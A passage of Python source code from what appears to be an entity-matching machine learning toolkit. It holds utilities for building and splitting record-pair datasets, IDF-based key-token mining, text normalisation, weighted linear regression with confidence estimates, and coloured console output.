htable2[i + 1] = 'right_' + htable2[i + 1]\r\n df = pd.DataFrame(columns=[\"label\"] + htable1[1:] + htable2[1:])\r\n e1 = []\r\n for item1 in readertable1:\r\n e1.append(item1)\r\n e2 = []\r\n for item2 in readertable2:\r\n e2.append(item2)\r\n progress = 0\r\n for item3 in readerpairs:\r\n data = []\r\n id = item3[0]\r\n label = item3[1]\r\n data.append(label)\r\n id1 = id.split(\",\")[0]\r\n id2 = id.split(\",\")[1]\r\n for item1 in e1:\r\n len1 = len(item1) - 1\r\n if item1[0] == id1:\r\n for i in range(len1):\r\n data.append(item1[i + 1])\r\n break\r\n for item2 in e2:\r\n len2 = len(item2) - 1\r\n if item2[0] == id2:\r\n for i in range(len2):\r\n data.append(item2[i + 1])\r\n break\r\n df.loc[len(df)] = data\r\n csvpairsfile.close()\r\n df.index.name = 'id'\r\n df.to_csv(dmpairsfilename)\r\n\r\n @staticmethod\r\n def division_specifiedtrain(dmpairsfilename, pairsfilename, tabletrainname, trainvalidproportion, outtrainname, outvalidname, outtestname, givenlabel=False):\r\n csvtrainpairsfile = open(tabletrainname, \"r\", encoding='ISO-8859-1')\r\n readertrainpairs = csv.reader(csvtrainpairsfile)\r\n trainset = {}\r\n headtrainpairs = next(readertrainpairs)\r\n for itemtrainpair in readertrainpairs:\r\n csvpairsfile = open(pairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n index = 0\r\n for itempair in readerpairs:\r\n index += 1\r\n if (itempair[0] == itemtrainpair[0]):\r\n trainset[str(index - 2)] = int(itemtrainpair[1])\r\n break\r\n csvpairsfile = open(dmpairsfilename, \"r\", encoding='ISO-8859-1')\r\n readerpairs = csv.reader(csvpairsfile)\r\n headpairs = next(readerpairs)\r\n train = pd.DataFrame(columns=headpairs)\r\n test = pd.DataFrame(columns=headpairs)\r\n for itempair in readerpairs:\r\n if itempair[0] in trainset:\r\n if givenlabel == True:\r\n itempair[1] = trainset[itempair[0]]\r\n train.loc[len(train)] = itempair\r\n else:\r\n test.loc[len(test)] = itempair\r\n # N = train.shape[0] - 1\r\n # train_n = int (N * a)\r\n # validation_n = N - train_n\r\n outtrain = train.sample(frac=trainvalidproportion, replace=False, axis=0)\r\n outvalidation = train.drop(labels=outtrain.axes[0])\r\n outtrain.to_csv(outtrainname, index=False)\r\n outvalidation.to_csv(outvalidname, index=False)\r\n test.to_csv(outtestname, index=False)\r\n\r\n class types:\r\n Lock = type(Lock())\r\n NoneType = type(None)\r\n\r\n class key_token_mining:\r\n\r\n KEY_TOKEN_MIN_LENGTH = 3\r\n\r\n def __init__(self, gml):\r\n self.gml = gml\r\n self.run()\r\n\r\n @staticmethod\r\n def tokenize_target_text(text):\r\n \"\"\"\r\n This implementation is consistent with 'basic_feature_analysis.py'\r\n :param text:\r\n :return:\r\n \"\"\"\r\n text = str(text).lower()\r\n if len(text) == 0 or text == 'nan' or text == 'n/a':\r\n return []\r\n tokens = nltk.word_tokenize(text)\r\n result = []\r\n for eachtoken in tokens:\r\n if metainfo.paras.nlpw2vgroups is not None and 'ex' in metainfo.paras.nlpw2vgroups:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern_ex, '', eachtoken)\r\n else:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern, '', eachtoken)\r\n if len(eachtoken) >= runtime.key_token_mining.KEY_TOKEN_MIN_LENGTH:\r\n result.append(eachtoken)\r\n return result\r\n\r\n @staticmethod\r\n def entity_target_text(text):\r\n text = str(text).lower()\r\n if len(text) == 0 or text == 'nan' or text == 'n/a':\r\n return []\r\n result = []\r\n for entity in text:\r\n normalized_entity = ' '.join(runtime.key_token_mining.tokenize_target_text(entity))\r\n 
result.append(normalized_entity)\r\n return result\r\n\r\n @staticmethod\r\n def process_text(text):\r\n if type(text) == str:\r\n return runtime.key_token_mining.tokenize_target_text(text)\r\n else:\r\n # entity list or set\r\n return runtime.key_token_mining.entity_target_text(text)\r\n\r\n def tokenize_target_attribute(self, target_attribute):\r\n \"\"\"\r\n :param target_attribute: str\r\n :param entity_splitter: If not None, process text to entities.\r\n :return:\r\n \"\"\"\r\n attr_values = []\r\n # data set #1\r\n attr_index1 = self.gml.data1.columns.get_loc(target_attribute)\r\n for eachrecordid in self.gml.records:\r\n recordtext = self.gml.records[eachrecordid]\r\n attr_values.append(runtime.key_token_mining.process_text(recordtext[attr_index1]))\r\n return attr_values\r\n\r\n @staticmethod\r\n def cal_token_idf(attribute_values):\r\n \"\"\"\r\n calculate Inverse document frequency.\r\n ref: https://en.wikipedia.org/wiki/Tf-idf\r\n :param attribute_values: [[...], ...]\r\n :return:\r\n \"\"\"\r\n token_2_idf = dict()\r\n token_2_freq = dict()\r\n if attribute_values is None:\r\n return token_2_idf\r\n token_2_docs = dict()\r\n docs_len = len(attribute_values)\r\n for i in range(docs_len):\r\n values = set(attribute_values[i])\r\n for token in values:\r\n token_2_docs.setdefault(token, set())\r\n token_2_docs[token].add(i)\r\n for eachtoken, v in token_2_docs.items():\r\n inv_doc_fre = len(token_2_docs.get(eachtoken)) + 1.0\r\n idf = np.log(1.0 * docs_len / inv_doc_fre)\r\n token_2_idf[eachtoken] = idf\r\n freq = len(token_2_docs.get(eachtoken))\r\n token_2_freq[eachtoken] = freq\r\n return token_2_idf, token_2_freq\r\n\r\n def mining_key_tokens(self, target_attribute_index):\r\n \"\"\"\r\n Select tokens with high IDF values.\r\n :param target_attribute:\r\n :param top_percent:\r\n :param qualified_threshold: Tokens that appear less than qualified_threshold will be selected.\r\n :return:\r\n \"\"\"\r\n target_attribute = self.gml.RecordAttributes[target_attribute_index]\r\n bottom_percent = 0\r\n low_qualified_threshold = 1\r\n top_percent = self.gml.data.infer_keytoken.idfrange\r\n qualified_threshold = self.gml.data.infer_keytoken.freqrange\r\n pattern_specified = runtime.regularpattern.index(self.gml.data.infer_keytoken.patternrestrict)\r\n if type(top_percent) == list:\r\n top_percent = top_percent[target_attribute_index]\r\n if type(top_percent) == list:\r\n bottom_percent = top_percent[0]\r\n top_percent = top_percent[1]\r\n if type(qualified_threshold) == list:\r\n qualified_threshold = qualified_threshold[target_attribute_index]\r\n if type(qualified_threshold) == list:\r\n low_qualified_threshold = qualified_threshold[0]\r\n qualified_threshold = qualified_threshold[1]\r\n column_name = '{} ~ {}, {} ~ {}, {}, {}'.format(bottom_percent, top_percent, low_qualified_threshold, qualified_threshold, self.gml.data.infer_keytoken.patternrestrict, self.gml.data.infer_keytoken.nlpw2vgroups)\r\n key_token_path = self.gml.processpath + \"infer_keytoken_\" + target_attribute + \".csv\"\r\n if os.path.exists(key_token_path) == False and (top_percent == 0 and qualified_threshold == 0):\r\n return []\r\n elif os.path.exists(key_token_path):\r\n # Still preprocesscached_keytokens when (top_percent > 0 or qualified_threshold > 0) but pattern != None makes an empty keytoken csv cached.\r\n kt_pd = pd.read_csv(key_token_path, dtype=str, encoding=\"utf-8\")\r\n if column_name == kt_pd.columns.tolist()[0]:\r\n key_tokens = list(kt_pd.values.reshape(-1))\r\n return key_tokens\r\n 
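A tiny standalone check of the smoothed IDF formula implemented in cal_token_idf above, idf(token) = ln(N / (df + 1)) with df the number of documents containing the token; the documents here are toy values for illustration.

import numpy as np

docs = [["cheap", "usb", "cable"], ["usb", "hub"], ["hdmi", "cable"]]
df_usb = sum("usb" in d for d in docs)   # document frequency: 2 of 3 docs
print(np.log(len(docs) / (df_usb + 1)))  # ln(3 / 3) = 0.0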
self.gml.preprocesscached_keytokens = False\r\n key_tokens = []\r\n if top_percent > 0 or qualified_threshold > 0:\r\n print(\"idf percent: {} ~ {}\".format(bottom_percent, top_percent))\r\n print(\"qualified threshold: {} ~ {}\".format(low_qualified_threshold, qualified_threshold))\r\n print(\"patternrestrict: {}: {}\".format(self.gml.data.infer_keytoken.patternrestrict, pattern_specified))\r\n print(\"nlpw2vgroups: {}\".format(self.gml.data.infer_keytoken.nlpw2vgroups))\r\n attr_2_tokens = self.tokenize_target_attribute(target_attribute)\r\n token_2_idf_values, token_2_freq_values = runtime.key_token_mining.cal_token_idf(attr_2_tokens)\r\n all_tokens_num = len(token_2_idf_values)\r\n bottom_percent_conform_countindex = np.maximum(int(bottom_percent * all_tokens_num), 1)\r\n top_percent_conform_countindex = np.maximum(int(top_percent * all_tokens_num), 1)\r\n idf_descending = sorted(token_2_idf_values.items(), key=lambda item: item[1], reverse=True)\r\n selected_number = 0\r\n selected_index = 0\r\n first_index = None\r\n last_index = None\r\n first_value = idf_descending[bottom_percent_conform_countindex - 1][1]\r\n last_value = idf_descending[top_percent_conform_countindex - 1][1]\r\n first_freq = token_2_freq_values[idf_descending[bottom_percent_conform_countindex - 1][0]]\r\n last_freq = token_2_freq_values[idf_descending[top_percent_conform_countindex - 1][0]]\r\n # Minimum IDF value.\r\n max_threshold = np.log(1.0 * len(attr_2_tokens) / (low_qualified_threshold + 1))\r\n min_threshold = np.log(1.0 * len(attr_2_tokens) / (qualified_threshold + 1))\r\n while selected_index < all_tokens_num:\r\n if top_percent > 0 and (first_value >= idf_descending[selected_index][1] and last_value <= idf_descending[selected_index][1]) or (max_threshold >= idf_descending[selected_index][1] and min_threshold <= idf_descending[selected_index][1]):\r\n if first_index == None:\r\n first_index = selected_index\r\n last_index = selected_index\r\n key_tokens.append(idf_descending[selected_index][0])\r\n selected_number += 1\r\n selected_index += 1\r\n if runtime.isNone(self.gml.data.infer_keytoken.nlpw2vgroups) == False and 'sparse' in self.gml.data.infer_keytoken.nlpw2vgroups and pattern_specified != None:\r\n for each_key_token in list(key_tokens):\r\n if runtime.regularpattern.ispattern(each_key_token, pattern_specified[0], pattern_specified[1], True) == False:\r\n key_tokens.remove(each_key_token)\r\n if metainfo.runningflags.refresh_cache == True:\r\n kt_pd = pd.DataFrame(key_tokens, columns=[column_name])\r\n kt_pd.to_csv(key_token_path, index=False, encoding=\"utf-8\")\r\n print(\"# of key tokens: {} / {}, saving file path: {}\".format(len(key_tokens), all_tokens_num, key_token_path))\r\n print(\"idf indexes from {} to {}\".format(first_index, last_index))\r\n print(\"idf qualified threshold from {} to {}\".format(first_freq, last_freq))\r\n print(\"patternrestrict: {}: {}\".format(self.gml.data.infer_keytoken.patternrestrict, pattern_specified))\r\n print(\"nlpw2vgroups: {}\".format(self.gml.data.infer_keytoken.nlpw2vgroups))\r\n return key_tokens\r\n\r\n def run(self):\r\n break_point = sys.stdout\r\n buffering_size = 1 # line buffering (ref: https://docs.python.org/3/library/functions.html#open)\r\n out_file = None\r\n if metainfo.runningflags.refresh_cache == True:\r\n out_file = open(self.gml.processpath + \"infer_keytoken.txt\", 'w', buffering_size, encoding='utf-8')\r\n else:\r\n out_file = open(self.gml.processpath + \"infer_keytoken.txt\", 'a+', buffering_size, encoding='utf-8')\r\n sys.stdout 
= out_file\r\n print(\"\\n\")\r\n time_info = '-' * 20 + str(datetime.datetime.fromtimestamp(time.time())) + '-' * 20\r\n print(time_info)\r\n out_file.flush()\r\n for target_attribute_index in range(1, len(self.gml.RecordAttributes)):\r\n print(\"\\n\")\r\n key_tokens = self.mining_key_tokens(target_attribute_index)\r\n self.gml.infer_keytoken[target_attribute_index] = key_tokens\r\n print(\"# of key tokens: {}\".format(len(key_tokens)))\r\n print(type(key_tokens))\r\n print(key_tokens[:10])\r\n print(\"\\n\")\r\n out_file.flush()\r\n print('-' * len(time_info))\r\n print(\"\\n\")\r\n out_file.flush()\r\n out_file.close()\r\n sys.stdout = break_point\r\n\r\n @staticmethod\r\n def process(string1, tostring = False):\r\n\r\n def prepreprocess(string1):\r\n strstring1 = str(string1).lower()\r\n if len(strstring1) == 0 or strstring1 == 'nan' or strstring1 == 'n/a':\r\n return ''\r\n else:\r\n try:\r\n string1 = float(string1)\r\n if string1 == round(string1):\r\n string1 = int(string1)\r\n else:\r\n string1 = runtime.round(string1)\r\n return string1\r\n except (TypeError, ValueError):\r\n return strstring1\r\n\r\n def preprocess(string1):\r\n if isinstance(string1, str):\r\n string1tokens = nltk.word_tokenize(string1)\r\n string1 = ''\r\n for eachtoken in string1tokens:\r\n if metainfo.paras.nlpw2vgroups is not None and 'ex' in metainfo.paras.nlpw2vgroups:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern_ex, '', eachtoken)\r\n else:\r\n eachtoken = re.sub(runtime.regularpattern.notunicodepattern, '', eachtoken)\r\n if len(eachtoken) > 0:\r\n if len(string1) > 0:\r\n string1 += ' '\r\n string1 += eachtoken\r\n multispacestring1 = str(string1)\r\n string1 = ''\r\n for eachtoken in multispacestring1.split():\r\n if len(string1) > 0:\r\n string1 += ' '\r\n string1 += eachtoken\r\n abbrstring1 = ''\r\n if len(string1) > 0:\r\n string1tokens = string1.split(' ')\r\n for index in range(0, len(string1tokens)):\r\n current1 = string1tokens[index]\r\n if runtime.regularpattern.ispattern(current1, runtime.regularpattern.numberpattern, runtime.regularpattern.matchway.contain, True):\r\n abbrstring1 += current1\r\n else:\r\n abbrstring1 += current1[0]\r\n return string1, abbrstring1\r\n else:\r\n return string1, string1\r\n\r\n if tostring == True:\r\n return str(preprocess(prepreprocess(string1))[0])\r\n else:\r\n return preprocess(prepreprocess(string1))[0]\r\n\r\n remove_punctuation_map = dict((ord(char), None) for char in string.punctuation)\r\n\r\n @staticmethod\r\n def find_lcsubstr(s1, s2):\r\n s1 = s1.lower()\r\n s2 = s2.lower()\r\n s1s = nltk.word_tokenize(s1.translate(runtime.remove_punctuation_map))\r\n s2s = nltk.word_tokenize(s2.translate(runtime.remove_punctuation_map))\r\n m = [[0 for i in range(len(s2s) + 1)] for j in range(len(s1s) + 1)] # zero matrix; the extra row/column keeps the DP indexing simple\r\n mmax = 0 # length of the longest match\r\n p = 0 # index just past the longest match in s1\r\n for i in range(len(s1s)):\r\n for j in range(len(s2s)):\r\n if s1s[i] == s2s[j]:\r\n m[i + 1][j + 1] = m[i][j] + 1\r\n if m[i + 1][j + 1] > mmax:\r\n mmax = m[i + 1][j + 1]\r\n p = i + 1\r\n maxcontinualwords = s1s[p - mmax:p]\r\n maxcontinualtokensrelativelength = float(len(maxcontinualwords)) / max(len(s1s), len(s2s))\r\n return len(maxcontinualwords), maxcontinualtokensrelativelength # return the longest common token run length and its relative length\r\n\r\n @staticmethod\r\n def round(value):\r\n if type(value) == list or type(value) == np.ndarray:\r\n roundedvalue = []\r\n for index in range(0, len(value)):\r\n roundedvalue.append(runtime.round(value[index]))\r\n return roundedvalue\r\n else:\r\n if value == None or value == 
metainfo.top.NOT_AVAILABLE:\r\n return metainfo.top.NOT_AVAILABLE\r\n else:\r\n if type(value) == np.float64 or type(value) == np.float32 or type(value) == float:\r\n return round(value, metainfo.paras.rounddigits)\r\n else:\r\n return value\r\n\r\n @staticmethod\r\n def isnumber(x):\r\n if type(x) == np.float64 or type(x) == np.float32 or type(x) == float or type(x) == complex or type(x) == int:\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def enum(**enums):\r\n return type('Enum', (), enums)\r\n\r\n class linearregression:\r\n n_job = 20\r\n delta = None\r\n themetafeature = None\r\n regression = None\r\n residual = None\r\n meanX = None\r\n variance = None\r\n X = None\r\n Y = None\r\n BalanceWeightY0Count = None\r\n BalanceWeightY1Count = None\r\n HardLabelEnhance0 = None\r\n HardLabelEnhance1 = None\r\n N = None\r\n k = None\r\n b = None\r\n monotonyeffective = None\r\n effectivetrainingcount = 2\r\n polarenforce = None\r\n variablebound = None\r\n updatecache = None\r\n regupdatecallback = None\r\n\r\n def voidfunction(self):\r\n pass\r\n\r\n # The linear regression does not regress on the probability of unit-area splitting;\r\n # instead, it regresses on the maximum weight values of all point instances,\r\n # to avoid a naive residual loss that depends on the sample count and drifts toward a constant-zero-weight line.\r\n # The highest confidence is located at the intuitive average feature value, which is also the most naive weight value,\r\n # so early risk is conservatively avoided and points with intuitive certainty are trusted first.\r\n\r\n def __init__(self, themetafeature, XY, polarenforce, variablebound, regupdatecallback = None):\r\n self.themetafeature = themetafeature\r\n self.polarenforce = polarenforce\r\n self.variablebound = variablebound\r\n self.regupdatecallback = regupdatecallback\r\n if self.regupdatecallback == None:\r\n self.regupdatecallback = self.voidfunction\r\n self.delta = metainfo.paras.regressiondelta\r\n self.updatecache = 0\r\n self.effectivetrainingcount = runtime.linearregression.effectivetrainingcount\r\n if len(XY) > 0:\r\n XY = np.array(list(XY))\r\n self.X = XY[:, 0].reshape(-1, 1)\r\n self.Y = XY[:, 1].reshape(-1, 1)\r\n else:\r\n self.X = np.array([]).reshape(-1, 1)\r\n self.Y = np.array([]).reshape(-1, 1)\r\n self.BalanceWeightY0Count = 0\r\n self.BalanceWeightY1Count = 0\r\n self.HardLabelEnhance0 = []\r\n self.HardLabelEnhance1 = []\r\n for y in self.Y:\r\n if y > 0:\r\n self.BalanceWeightY1Count += 1\r\n else:\r\n self.BalanceWeightY0Count += 1\r\n self.performregression()\r\n\r\n def append(self, appendx, appendy, hardlabel):\r\n self.X = np.append(self.X, [[appendx]], axis=0)\r\n self.Y = np.append(self.Y, [[appendy]], axis=0)\r\n if appendy >= 0:\r\n self.BalanceWeightY1Count += 1\r\n if hardlabel == True:\r\n self.HardLabelEnhance1.append(appendx)\r\n else:\r\n self.BalanceWeightY0Count += 1\r\n if hardlabel == True:\r\n self.HardLabelEnhance0.append(appendx)\r\n\r\n def disable(self, delx, dely):\r\n for index in range(0, len(self.X)):\r\n if self.X[index][0] == delx and self.Y[index][0] == dely:\r\n self.X = np.delete(self.X, index, axis=0)\r\n self.Y = np.delete(self.Y, index, axis=0)\r\n if dely > 0:\r\n self.BalanceWeightY1Count -= 1\r\n else:\r\n self.BalanceWeightY0Count -= 1\r\n break\r\n self.performregression()\r\n\r\n def monotonycheck(self):\r\n if self.regression == None or self.k < 0:\r\n self.monotonyeffective = False\r\n else:\r\n self.monotonyeffective = True\r\n\r\n def performregression(self):\r\n self.N = 
np.size(self.X)\r\n if self.themetafeature != metainfo.top.SIFT and self.N <= self.effectivetrainingcount:\r\n self.regression = None\r\n self.residual = None\r\n self.meanX = None\r\n self.variance = None\r\n self.k = None\r\n self.b = None\r\n else:\r\n if self.themetafeature != metainfo.top.SIFT and self.updatecache > 0:\r\n self.updatecache -= 1\r\n else:\r\n SampleWeightlist = []\r\n SampleWeight = None\r\n if len(np.unique(self.X)) == 1 or self.BalanceWeightY1Count == 0 or self.BalanceWeightY0Count == 0:\r\n SampleWeight = 1\r\n else:\r\n SampleWeight = float(self.BalanceWeightY0Count) / self.BalanceWeightY1Count\r\n HardLabelEnhanced0 = list(self.HardLabelEnhance0)\r\n HardLabelEnhanced1 = list(self.HardLabelEnhance1)\r\n for eachindex in range(0, self.N):\r\n eachx = self.X[eachindex][0]\r\n eachy = self.Y[eachindex][0]\r\n if eachy >= 0:\r\n if eachx in HardLabelEnhanced1:\r\n SampleWeightlist.append(math.pow(metainfo.paras.hard_label_learn_enhance_multiplier, metainfo.paras.hard_label_learn_enhance_multiplier_coefficient) * math.pow(SampleWeight, metainfo.paras.class_weight_multiplier_coefficient))\r\n HardLabelEnhanced1.remove(eachx)\r\n else:\r\n SampleWeightlist.append(SampleWeight)\r\n else:\r\n if eachx in HardLabelEnhanced0:\r\n SampleWeightlist.append(math.pow(metainfo.paras.hard_label_learn_enhance_multiplier, metainfo.paras.hard_label_learn_enhance_multiplier_coefficient) * math.pow(1, metainfo.paras.class_weight_multiplier_coefficient))\r\n HardLabelEnhanced0.remove(eachx)\r\n else:\r\n SampleWeightlist.append(1)\r\n assert(len(HardLabelEnhanced0) == 0 and len(HardLabelEnhanced1) == 0)\r\n self.regression = LinearRegression(copy_X=True, fit_intercept=True, n_jobs=runtime.linearregression.n_job).fit(self.X, self.Y, sample_weight=SampleWeightlist)\r\n self.residual = np.sum((self.regression.predict(self.X) - self.Y) ** 2) / (self.N - 2)\r\n self.meanX = np.mean(self.X)\r\n self.variance = np.sum((self.X - self.meanX) ** 2)\r\n self.k = self.regression.coef_[0][0]\r\n self.b = self.regression.intercept_[0]\r\n self.monotonycheck()\r\n self.updatecache = min(metainfo.paras.updatecache_abscapacity, int(metainfo.paras.updatecache_proportion * self.N))\r\n self.regupdatecallback()\r\n\r\n def predictconfidence(self, x0):\r\n evidentialsupport = None\r\n espredict = None\r\n if self.regression != None and self.monotonyeffective == True:\r\n predict = self.regression.predict(np.array([x0]).reshape(-1, 1))[0][0]\r\n confidence = 1\r\n if self.residual > 0 and self.variance > 0:\r\n tvalue = float(self.delta) / (self.residual * math.sqrt(1 + float(1) / self.N + math.pow(x0 - self.meanX, 2) / self.variance))\r\n confidence = 1 - t.sf(tvalue, (self.N - 2)) * 2\r\n evidentialsupport = (1 + confidence)/2\r\n espredict = predict * evidentialsupport\r\n if self.polarenforce == 0:\r\n espredict = min(espredict, 0)\r\n else:\r\n if self.polarenforce == 1:\r\n espredict = max(espredict, 0)\r\n else:\r\n confidence = 0\r\n evidentialsupport = (1 + confidence) / 2\r\n espredict = 0\r\n return evidentialsupport, espredict\r\n\r\n @staticmethod\r\n def consoleprogress(i, n, info):\r\n len_bar = 100\r\n if n == 0:\r\n return\r\n unit = int(n / 100)\r\n if unit == 0:\r\n unit = 1\r\n if i % unit == 0 or i == n:\r\n i = int(float(i) / n * 100)\r\n format_percent = None\r\n format_bar = None\r\n if i < 10:\r\n format_percent = \"\\r%d%% \"\r\n elif i < 100:\r\n format_percent = \"\\r%d%% \"\r\n else:\r\n format_percent = \"\\r%d%%\"\r\n format_bar = \"%s%s%s%s%s%s\"\r\n show_percent = 
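For reference, a minimal standalone sketch of the t-distribution confidence computed in predictconfidence above (the same formula; the function and parameter names here are illustrative); like the guarded branch in the method, it assumes residual > 0, variance > 0, and N > 2.

import math
from scipy.stats import t as student_t

def interval_confidence(delta, residual, n, x0, mean_x, sxx):
    # t = delta / (s * sqrt(1 + 1/N + (x0 - mean_x)^2 / Sxx)); confidence = 1 - 2 * SF(t)
    tvalue = delta / (residual * math.sqrt(1 + 1.0 / n + (x0 - mean_x) ** 2 / sxx))
    return 1 - 2 * student_t.sf(tvalue, n - 2)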
format_percent % (i)\r\n len_blank = int((len_bar - len(info)) / 2)\r\n left_blank_process_pos = 0\r\n info_process_pos = 0\r\n right_blank_process_pos = 0\r\n if i <= len_blank:\r\n left_blank_process_pos = i\r\n elif i <= len_blank + len(info):\r\n left_blank_process_pos = len_blank\r\n info_process_pos = i - len_blank\r\n else:\r\n left_blank_process_pos = len_blank\r\n info_process_pos = len_blank + len(info)\r\n right_blank_process_pos = i - (len_blank + len(info))\r\n show_bar = format_bar % (runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + \" \" * left_blank_process_pos,\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + \" \" * (len_blank - left_blank_process_pos),\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + info[0:info_process_pos],\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + info[info_process_pos:len(info)],\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKBLUE + \" \" * right_blank_process_pos,\r\n runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN + \" \" * (len_blank - right_blank_process_pos))\r\n show = show_percent + '[' + show_bar + runtime.console.color.END + ']'\r\n sys.stdout.write(show)\r\n sys.stdout.flush()\r\n if i == 100:\r\n print()\r\n\r\n @staticmethod\r\n def pickledump(gml, structurename, flag):\r\n picklefile = gml.processpath + structurename + '.pkl'\r\n if flag == 'w':\r\n structure = eval('gml.' + structurename)\r\n output = open(picklefile, 'wb')\r\n pickle.dump(structure, output)\r\n else:\r\n if flag == 'r':\r\n output = open(picklefile, 'rb')\r\n exec('gml.' + structurename + ' = pickle.load(output)')\r\n else:\r\n if flag == 'e':\r\n return os.path.exists(picklefile)\r\n\r\n class console:\r\n\r\n class color:\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n BACKGROUND = '\\033[7m'\r\n RED = '\\033[91m'\r\n GREEN = '\\033[92m'\r\n YELLOW = '\\033[93m'\r\n BLUE = '\\033[94m'\r\n PURPLE = '\\033[95m'\r\n CYAN = '\\033[96m'\r\n BLACK = '\\033[30m'\r\n DARKRED = '\\033[31m'\r\n DARKGREEN = '\\033[32m'\r\n DARKYELLOW = '\\033[33m'\r\n DARKBLUE = '\\033[34m'\r\n DARKPURPLE = '\\033[35m'\r\n DARKCYAN = '\\033[36m'\r\n END = '\\033[0m'\r\n COLORS = [RED, GREEN, YELLOW, BLUE, PURPLE, CYAN, BLACK, DARKRED, DARKGREEN, DARKYELLOW, DARKBLUE, DARKPURPLE, DARKCYAN]\r\n\r\n class styles(Flag):\r\n TOP = auto()\r\n INFO = auto()\r\n STRESS = auto()\r\n OUTLOOK = auto()\r\n REPORT = auto()\r\n CORRECTION = auto()\r\n EXCEPTION = auto()\r\n SIMPLE_CORRECTION = auto()\r\n SIMPLE_EXCEPTION = auto()\r\n PERIOD = auto()\r\n\r\n def __init__(self, title, content, style):\r\n exceptionframe = sys._getframe(1)\r\n functionname = exceptionframe.f_code.co_name\r\n functionlineno = exceptionframe.f_lineno\r\n header1 = None\r\n header2 = None\r\n header3 = None\r\n if style == runtime.console.styles.TOP:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.BOLD + runtime.console.color.RED\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BOLD + runtime.console.color.DARKPURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BOLD + runtime.console.color.PURPLE\r\n elif style == runtime.console.styles.INFO:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3 = 
runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.STRESS:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.PURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.OUTLOOK:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.REPORT:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLUE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n elif style == runtime.console.styles.CORRECTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3 = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n elif style == runtime.console.styles.EXCEPTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.RED\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3 = runtime.console.color.END + runtime.console.color.DARKRED\r\n elif style == runtime.console.styles.SIMPLE_CORRECTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLACK\r\n header3 = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n elif style == runtime.console.styles.SIMPLE_EXCEPTION:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.DARKBLUE\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.BLACK\r\n header3 = runtime.console.color.END + runtime.console.color.DARKRED\r\n elif style == runtime.console.styles.PERIOD:\r\n header1 = runtime.console.color.END + runtime.console.color.UNDERLINE + runtime.console.color.BACKGROUND + runtime.console.color.DARKCYAN\r\n header2 = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3 = runtime.console.color.END + runtime.console.color.BLACK\r\n if title != None:\r\n icon = ''\r\n title_lower = str(title).lower()\r\n if 'save' in title_lower:\r\n icon = '💾'\r\n elif 'error' in title_lower or style == runtime.console.styles.EXCEPTION:\r\n icon = '⚠'\r\n elif style == runtime.console.styles.TOP:\r\n icon = '🎄🎊🔮🔮🔮'\r\n elif style == runtime.console.styles.PERIOD:\r\n icon = '📁'\r\n else:\r\n icon = '📧'\r\n showtext = str(title) + ' (@' + functionname + ', ' + str(functionlineno) + ') █▓▒░'\r\n if style == runtime.console.styles.TOP:\r\n showtext_unicodelist = list(showtext)\r\n for eachindex in range(0, len(showtext_unicodelist)):\r\n showtext_unicodelist[eachindex] = np.random.choice(runtime.console.color.COLORS, 1, False, None)[0] + showtext_unicodelist[eachindex]\r\n 
